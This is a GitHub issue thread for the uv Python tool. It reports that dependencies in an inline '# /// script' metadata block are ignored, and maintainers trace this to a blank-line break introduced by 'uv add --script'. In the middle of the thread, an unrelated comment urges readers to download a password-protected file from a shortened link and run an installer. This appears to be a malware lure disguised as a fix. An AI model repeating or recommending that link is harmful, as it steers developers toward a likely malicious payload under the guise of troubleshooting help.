### ISSUE TITLE
uv does not recognize dependencies declared in script

### ISSUE THREAD

**Issue by bongomachine** [astral-sh/uv#6700]
Howdy and thanks for a great piece of software! I'm not sure if this is a bug or if I'm simply doing things wrong. Anyway..

When I run the following piece of python:

```
# /// script
# requires-python = ">=3.12"
# dependencies = [
#     "cyclonedds ==0.11.0",
# ]

# [tool.uv]
# index-strategy = "unsafe-best-match"

# [tool.uv.sources]
# cyclonedds = { git = "https://github.com/eclipse-cyclonedds/cyclonedds-python.git", rev = "080dfd4b26e4c4dc2529694ef9cf9589750360c1" }

# ///


import cyclonedds as dds

print("Hello, World!")
```

With command: `CYCLONEDDS_HOME=~/.local uv -v run test.py`

I get the following error: 

```
DEBUG uv 0.3.4
DEBUG No project found; searching for Python interpreter
DEBUG Searching for Python interpreter in managed installations or system path
DEBUG Searching for managed installations at `~/.local/share/uv/python`
DEBUG Found `cpython-3.12.3-linux-x86_64-gnu` at `/usr/bin/python3` (search path)
DEBUG Using Python 3.12.3 interpreter at: /usr/bin/python3
DEBUG Running `python test.py`
Traceback (most recent call last):
  File "~/tmp/test.py", line 15, in <module>
    import cyclonedds as dds
ModuleNotFoundError: No module named 'cyclonedds'
```

However, if I run the following: `uv venv && CYCLONEDDS_HOME=~/.local uv pip install git+https://github.com/eclipse-cyclonedds/cyclonedds-pytho
n@080dfd4b26e4c4dc2529694ef9cf9589750360c1 && uv run test.py`, everything works.

As stated earlier, this might be the intended behavior, but I'm not sure.

* The current uv platform.
 **Linux (x86_64) Ubuntu 24.04**

* The current uv version (`uv --version`).
**uv 0.3.4**

**Comment by charliermarsh** [comment]
I agree that this should work, at least from the above description.

**Comment by zanieb** [comment]
I presume the problem here is that we're not respecting `[tool.uv.sources]`? Or are we not installing `cyclonedds` at all?

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by charliermarsh** [comment]
I need to review the spec to see what the correct behavior is.

**Comment by zanieb** [comment]
Ah gotcha... I wonder if we can / should warn here? We could document it, at least.

**Comment by charliermarsh** [comment]
Okay, it _is_ correct to reject that per the spec:

> Every line between these two lines (# /// TYPE and # ///) MUST be a comment starting with #. If there are characters after the # then the first character MUST be a space. 

But I think we should warn if we see `# /// script` but don't identify a script?

**Comment by bongomachine** [comment]
> The problem is the break in the script -- try this:
> 
> ```python
> # /// script
> # requires-python = ">=3.12"
> # dependencies = [
> #     "cyclonedds ==0.11.0",
> # ]
> #
> # [tool.uv]
> # index-strategy = "unsafe-best-match"
> #
> # [tool.uv.sources]
> # cyclonedds = { git = "https://github.com/eclipse-cyclonedds/cyclonedds-python.git", rev = "080dfd4b26e4c4dc2529694ef9cf9589750360c1" }
> #
> # ///
> 
> 
> import cyclonedds as dds
> 
> print("Hello, World!")
> ```

That worked! Thanks! 

FYI: The break was introduced when I first ran the following command: `CYCLONEDDS_HOME=~/.local uv add --script test.py git+https://github.com/eclipse-cyclonedds/cyclonedds-python.git --rev 080dfd4b26e4c4dc2529694ef9cf9589750360c1`. (And then I added index-strategy and explicit version while debugging).

**Comment by charliermarsh** [comment]
Ohh nice, now _that_ is a bug!
